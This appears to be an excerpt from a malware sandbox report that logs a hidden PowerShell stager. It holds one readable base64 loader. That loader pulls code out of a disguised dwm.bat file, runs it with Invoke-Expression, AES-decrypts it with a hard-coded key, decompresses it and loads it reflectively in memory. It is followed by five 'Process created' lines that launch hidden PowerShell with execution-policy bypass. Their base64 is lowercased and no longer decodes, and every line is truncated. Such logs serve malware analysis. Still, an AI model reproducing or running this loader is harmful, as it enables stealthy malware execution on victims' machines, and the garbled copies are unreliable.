"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('jhvzzxjoyw1lid0gjgvudjpvu0vstkfnrtskcgxwcwwgpsaiqzpcvxnlcnncjhvzzxjoyw1lxgr3bs5iyxqio2lmichuzxn0lvbhdgggjhbschfsksb7icagifdyaxrlluhvc3qgikjhdgnoigzpbgugzm91bmq6icrwbhbxbcigluzvcmvncm91bmrdb2xvcibdewfuoyagicakzmlszuxpbmvzid0gw1n5c3rlbs5jty5gawxlxto6umvhzefsbexpbmvzkcrwbhbxbcwgw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgock7icagigzvcmvhy2ggkcrsaw5ligluicrmawxltgluzxmpihsgicagicagiglmicgkbgluzsatbwf0y2ggj146ojogpygukykkjykgeyagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrldgvjdgvkigluihrozsbiyxrjacbmawxlliigluzvcmvncm91bmrdb2xvcibdewfuoyagicagicagicagihryesb7icagicagicagicagicagicrkzwnvzgvkqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrtyxrjagvzwzfdllryaw0oksk7icagicagicagicagicagicrpbmply3rpb25db2rlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vw5py29kzs5hzxrtdhjpbmcojgrly29kzwrcexrlcyk7icagicagicagicagicagifdyaxrlluhvc3qgikluamvjdglvbibjb2rligrly29kzwqgc3vjy2vzc2z1bgx5liigluzvcmvncm91bmrdb2xvcibhcmvlbjsgicagicagicagicagicagv3jpdgutsg9zdcairxhly3v0aw5nigluamvjdglvbibjb2rlli4uiiatrm9yzwdyb3vuzenvbg9yifllbgxvdzsgicagicagicagicagicagsw52b2tlluv4chjlc3npb24gjgluamvjdglvbknvzgu7icagicagicagicagicagigjyzwfroyagicagicagicagih0gy2f0y2ggeyagicagicagicagicagicbxcml0zs1ib3n0icjfcnjvcibkdxjpbmcgzgvjb2rpbmcgb3igzxhly3v0aw5nigluamvjdglvbibjb2rloiakxyigluzvcmvncm91bmrdb2xvcibszwq7icagicagicagicagftsgicagicagih07icagih07fsblbhnlihsgicagicbxcml0zs1ib3n0icjtexn0zw0grxjyb3i6iejhdgnoigzpbgugbm90igzvdw5koiakcgxwcwwiic1gb3jlz3jvdw5kq29sb3igumvkoyagicblegl0o307znvuy3rpb24gemr0z3qojhbhcmftx3zhcil7csrhzxnfdmfypvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lkflc106oknyzwf0zsgpowkkywvzx3zhci5nb2rlpvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5lknpcghlck1vzgvdojpdqkm7csrhzxnfdmfyllbhzgrpbmc9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuugfkzgluz01vzgvdojpqs0ntnzsjjgflc192yxius2v5pvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj3nyegtusgezmevib3gxcmd2ykdoyzjnrnpwqvluy1hese1sqmfsq0x1cgm9jyk7csrhzxnfdmfylklwpvttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoj0l5cnlfvjrzovmzvmdwu3fxq2lpb0e9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gahrkdxmojhbhcmftx3zhcil7csrrdhlxdz1ozxctt2jqzwn0ifn5c3rlbs5jty5nzw1vcnltdhjlyw0olcrwyxjhbv92yxipowkkamxwbme9tmv3lu9iamvjdcbtexn0zw0usu8utwvtb3j5u3ryzwftowkkb3hmzwk9tmv3lu9iamvjdcbtexn0zw0usu8uq29tchjlc3npb24ur1ppcfn0cmvhbsgka3r5cxcsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsjjg94zmvplknvchlubygkamxwbmepowkkb3hmzwkurglzcg9zzsgpowkka3r5cxcurglzcg9zzsgpowkkamxwbmeurglzcg9zzsgpowkkamxwbmeuvg9bcnjhesgpo31mdw5jdglvbib2bwv1ccgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjjhvxzw1ipvttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06oignzgfvtcd
